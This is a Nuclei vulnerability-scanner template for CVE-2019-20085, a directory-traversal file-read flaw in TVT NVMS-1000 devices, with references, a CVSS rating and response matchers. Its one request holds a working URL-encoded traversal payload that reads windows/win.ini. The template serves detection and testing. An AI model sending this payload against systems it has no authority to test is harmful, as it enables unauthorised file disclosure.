nuclei-templates/cves/2019/CVE-2019-20085.yaml

38 lines
990 B
YAML

id: CVE-2019-20085
info:
name: TVT NVMS 1000 - Local File Inclusion
author: daffainfo
severity: high
description: |
TVT NVMS-1000 devices allow GET /.. local file inclusion attacks.
reference:
- https://www.exploit-db.com/exploits/48311
- https://www.exploit-db.com/exploits/47774
- http://packetstormsecurity.com/files/157196/TVT-NVMS-1000-Directory-Traversal.html
- https://nvd.nist.gov/vuln/detail/CVE-2019-20085
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-20085
cwe-id: CWE-22
tags: cve,cve2019,iot,lfi,cisa
requests:
- method: GET
path:
- "{{BaseURL}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "\\[(font|extension|file)s\\]"
- type: status
status:
- 200
# Enhanced by mp on 2022/06/10